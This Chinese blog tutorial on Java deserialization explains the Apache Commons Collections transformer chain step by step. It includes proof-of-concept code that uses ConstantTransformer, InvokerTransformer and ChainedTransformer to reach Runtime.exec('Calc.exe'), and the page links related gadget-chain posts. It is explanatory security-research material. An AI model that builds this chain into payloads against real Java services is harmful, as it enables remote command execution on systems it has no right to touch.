反序列化调用链——Commons Collections 迭代调用链

已于 2022-10-19 13:46:17 修改
阅读量1.1k 收藏
点赞数
分类专栏: Java代码审计 文章标签: Java代码审计
于 2021-11-04 13:55:43 首次发布
本文为博主原创文章,未经博主允许不得转载,未授权转载为侵权行为,违反法律。
本文链接:https://blog.csdn.net/qq_36869808/article/details/121105988
版权

0x00 前言

反序列化总纲

单独的写迭代连的调用,主要原因是因为很多Commons Collections链都是以迭代链为基础而进行进一步利用的。所以先把迭代链找出来。
顺便把Commons Collection的概述基础这些也做一个介绍。

0x01 迭代链

网上大多的文章都是先介绍Transformer等一系列使用到的类,这里我们试着反着来。先上迭代链。迭代链就是通过某种迭代的方式执行多个Transform方法来获取实例。

可以再简单的说,他的本质就是通过嵌套的方式一层一层的执行。

1. 迭代链POC

Transformer[] transformers = new Transformer[]{

        //利用InvokerTransformer的反射功能,构造可以序列化的 java.lang.Class 的 Runtime,class对象
        //利用反射构造命令执行
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}),
        new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}),
        new InvokerTransformer("exec",
                new Class[]{String.class},
                new String[]{"Calc.exe"}),
};
Transformer transformerChain = new ChainedTransformer(transformers);
transformerChain.transform(Object.class)

直接执行这个poc就可以触发Calc.exe。
这里是手动写transform进行触发迭代链的。
接下来挨着来看迭代链。简单的整理一下流程就是:

  • 拿到对应类
  • 反射获取方法
  • 执行方法
  • 触发

那么我们期望的执行方式实际上就是如下图所示的样子:
在这里插入图片描述
这里我们一步一步来进行拆分,然后再进行整合。

2.获取目标类

我们可以通过ConstantTransformer类中的transform方法来获取类,先来看效果,然后挨着说

Object o=new ConstantTransformer(Runtime.class).transform(Object.class); 
System.out.println(o);

在这里插入图片描述
ConstantTransformer实现了Transformer接口,重写了transform。
先来看Transformer接口:
在这里插入图片描述
然后再看重写的内容:可以获取到对应的类
在这里插入图片描述

3.获取目标类方法

获取目标类的方式使用的 InvokerTransformer,InvokerTransformer类的主要作用就是利用Java反射机制来创建类实例。
这里得先看一下InvokerTransformer和他的Transformer方法
首先是构造方法,这里的构造方法会接收三个参数,方法名,方法类型,方法的数值。
在这里插入图片描述
然后来看Transformer方法:直接调用反射机制来获取到方法的实例。
在这里插入图片描述
那么我们要执行exec就要进行连续获取

  • getMethod
  • getRuntime
  • invoke
  • exec

那么获取执行方法实例的poc就是:

Object o=new ConstantTransformer(Runtime.class).transform(Object.class);
Object a=new InvokerTransformer("getMethod",
        new Class[]{String.class, Class[].class},
        new Object[]{"getRuntime", new Class[0]}).transform(o);
Object b=new InvokerTransformer("invoke",
        new Class[]{Object.class, Object[].class},
        new Object[]{null, new Object[0]}).transform(a);
Object c=new InvokerTransformer("exec",
        new Class[]{String.class},
        new String[]{"Calc.exe"}).transform(b);

还有一种简单的方式就是:但是通过这种方式调用的实例无法进行反序列化操作

new ConstantTransformer(Runtime.getRuntime())
new InvokerTransformer("exec", new Class[]{String.class},        new Object[]{"Calc.exe"}),

不能调用的原因如下:

简单的看一下getRuntime,可以看到是static,java无法对static修饰的方法或属性进行序列化和反序列化。因为static在系统启动时就保存在了某一个特定的位置。
在这里插入图片描述

4.迭代调用

那么直接调用的方式是我们需要手动的去调用他们的transform方法,我们需要找到一个可以进行迭代调用的方式。庆幸的是存在一个ChainedTransformer类,ChainedTransformer类实现了Transformer链式调用,我们只需要传入一个Transformer数组ChainedTransformer就可以实现依次的去调用每一个Transformer的transform方法。
那么我们通过ChainedTransformer类调用:

Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod",
                new Class[]{String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}),
        new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}),
        new InvokerTransformer("exec",
                new Class[]{String.class},
                new String[]{"Calc.exe"}),
};
Transformer transformerChain = new ChainedTransformer(transformers);
transformerChain.transform(Object.class);

那么这样就可以直接触发整个transformers数组的Transform方法。 面临的问题就是如何去触发ChainedTransformer的Transform方法。那么这个就是之后整个反序列链的基础链。

0x03 使用条件

  • 无限制

0x04 要点笔记

  • ConstantTransformer获取类
  • InvokerTransformer反射方法
  • ChainedTransformer迭代调用
王嘟嘟_
关注
专栏目录
apache-commons-collections7反序列化分析
12-02 243
apache-commons-collections7反序列化分析 apache-commons-collections7反序列化也是对ACC1的变形利用罢了,倒是其中涉及一些hash知识 复现环境 JDK7+CommonsCollections1 前景知识 这里要在前面说一下的是Hashtable.put方法新增的元素,是存储在Hashtable$Entry这个内部类里面的,那么获取元素也是在这个内部类获取的,这个跟进一下Hashtable.put方法就能知道 LazyMap.put方法新增的元素,
反序列化调用汇总
王嘟嘟的博客
03-14 362
这里整合一下反序列化调用的文章。
Apache Commons Collections反序列化
最新发布
why811的博客
08-17 195
Apache Commons Collections中有一个特殊的接口TransformerInvokerTransformer是实现了Transformer接口的一个类,这个类可以可以通过Java的反射机制来调用任意函数可以看到该InvokerTransformer类是实现Transformer接口的(Transformer接口主要用于转换并返回一个给定的Object对象),且其中的transform()方法采用反射机制进行任意函数调用,这就是漏洞点所在。
Java反序列化】CC1调用poc
m0_61572518的博客
04-24 2075
package demo3.cc1; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.In.
调用 php,ThinkPHP5.1.x反序列化调用复现分析
weixin_39627201的博客
03-10 298
1.前言最近研究了phpok5.3反序列化可直接getshell的漏洞,又见到土司里对ThinkPHP多个版本调用的总结,于是便想着来复现分析一下。本文只是对反序列化调用的分析,POC并不能直接被利用,需要基于ThinkPHP开发的代码有可用的反序列化入口。2.反序列化调用分析通常PHP反序列化的漏洞的入口为类的魔术方法,PHP是这样定义魔术方法的:PHP将所有以__(两个下划...
CommonsCollection4反序列化学习.doc
07-09
`TransformingComparator` 是 Commons Collections 中的一个比较器,它在反序列化中扮演关键角色。在 Commons Collection 4 中,这个类的构造方式发生了变化,不再直接使用 InvokeTransformer,而是通过 ...
JAVA反序列化之CommonCollections1利用
lt_xiaodou的博客
08-30 361
看到这里,是否有一种豁然开朗的感觉?到这里相信大家对上面的Demo原理已经了解了,但是现在有一个问题,我们在本机执行是可以执行代码了,但是怎么反序列化漏洞中来利用这个利用呢?通过上面的调用总结可以看出,这一套调用主要是围绕着Transformer接口的transform方法的,所以说要找到一个在readObject方法中能调用transform方法的地方。整篇文章总体思路是跟着P牛的文章思路来的,只不过因为基础薄弱很多地方都详细分析了一遍。...
【web安全】记一次 Commons Collections调用的挖掘
HBohan的博客
12-13 1097
最近回顾了下之前的关于Commons Collections这块的笔记,从CC1到CC10,从调用来看,其实都是很相似的。为了巩固下复习的效果,尝试挖掘一条新的调用,遂出现了本文,大佬轻喷。 建议读者对Commons Collections有一定了解后再阅读此文。
commons-collections-3.2.2-bin.zip
02-03
7. **集合的序列化与反序列化**:提供了一种方便的方式来序列化和反序列化集合,这对于数据存储和网络传输非常有用。 8. **泛型支持**:Collections库在3.2.2版本中已经支持Java泛型,这使得代码更具类型安全性和...
commons-collections-3.2.jar
09-29
10. **工具类**:包含一些通用的实用工具,如集合的深度拷贝、序列化和反序列化、对象的克隆等。 在实际开发中,"commons-collections-3.2.jar"可以被广泛应用于数据处理、数据结构优化和算法实现等领域。只需将此...
Ysoserial Commons-Collections利用分析
further_eye的博客
09-09 407
Commons-Collections1 首先构造transformers反射调用ChainedTransformer方法封装transformers数组,串联三次反射。 final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] {String.class, Cl
排序第六章:归并排序第二版本(迭代调用
patrick_star 的博客
03-27 225
#define MAX_SIZE 10typedef struct{ int m[MAX_SIZE ]; int length;} SqList;//用排序,铁定跑不了这个swap函数,最好自己写一个void swap(SqList *q, int i, int j);void swap(SqList *q, int i, int j){ int temp = q->m[i]; q->...
js 中的迭代方法
weixin_33711647的博客
06-26 92
ECMAScript 为数组定义了五个迭代方法。 每个方法都接收两个参数:要在每一项上运行的函数和(可选的)运行该函数的作用域对象——影响this的值。 传入这些方法中的函数会接收三个参数:数组项的值、该项在数组中的位置和数组对象本省。 根据使用的方法不同,这个函数执行后的返回值可能会也可能不会影响方法的返回值。 以下是这五个迭代方法的作...
迭代与函数
weixin_41321563的博客
12-19 412
迭代与函数 迭代迭代器是用来帮助我们记录每次迭代访问到的位置,当我们对迭代器使用next()函数的时候,迭代器会向我们返回它所记录位置的下一个位置的数据。实际上,在使用next()函数的时候,调用的就是迭代器对象的_next_方法。所以,我们要想构造一个迭代器,就要实现它的_next_方法。但这还不够,python要求迭代器本身也是可迭代的,所以我们还要为迭代器实现_iter_方法,而_ite...
迭代的多方面使用
qq_32363305的博客
12-01 409
本人java小白一个,最近学了迭代,故记之。   迭代故名思意,就是无限的循环,它跟for循环也是很相关的。在这里,我总结下,什么事迭代迭代就是,无限循环自己,然后一个推出的条件。 在这里,就用一个例子来说明。  现在有一张单位表,在这张单位表里面有一些,按层级显示的数据。 如: 数据库方面: 实体方面: /** * 子集 * @return */ priv
Java反序列化(十二)CommonCollectionsK2分析
Vicl1fe的博客
10-25 397
CommonCollectionsK2 在 Shiro_k1文章中讲解了CommonCollectionsK1的利用代码。需要CC版本小于3.2.1。 而CommonCollectionsK2就是在CC4.0中的利用。其实利用代码和K1的是一样的。只是有一个地方不一样。 在K1中,LazyMap是这样获取的 Map lazyMap = LazyMap.decorate(outmap,faketransformer); 而在CC4中,没有了decorate方法。用lazyMap方法代替即可 所以K2中这样
如何调用迭代器iterator
小白的专栏
09-23 2892
先介绍一下Java的集合类 1、List和Set都实现了Collection接口,Collection的常用方法有:       add(E  e) ;往集合中添加一个对象        remove(Object  o)  ;从集合中删除一个对象         Boolean     isEmpty()   ;判断集合是否为空         iterator()  
递归和迭代
Hello FishSalter
01-05 442
SICP中递归和迭代的一点笔记首先看两个lisp函数,都是用来求阶乘的.(define (factorial n) (if (= n 1) 1 (* n (factorial (- n 1)))))(define (factorial n) (fact-iter 1 1 n)) (define (fact-iter product counter ma
迭代与递归
li3781695的博客
01-23 262
迭代与递归其实有相似之处,以从累加为例。 迭代:重复执行相同步骤多少次(已知次数)以后停止 int sum(int n){ if(n>1){ for(i=1;i<n;i++) { n=n+i; } }else{ return 1; } } 递归:重复嵌套执行自身(未知次数)直到符合条件以后停止,并将结果层层返回处理输出最终结果 int sum(int...
深入解析Java序列化与反序列化原理及应用
本文将深入探讨Java序列化和反序列化的概念、应用场景和实现方法,帮助Java开发者更好地理解和运用这两个关键技术。首先,我们来了解一下什么是Java序列化和反序列化。 **Java序列化** Java序列化是指将Java对象的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值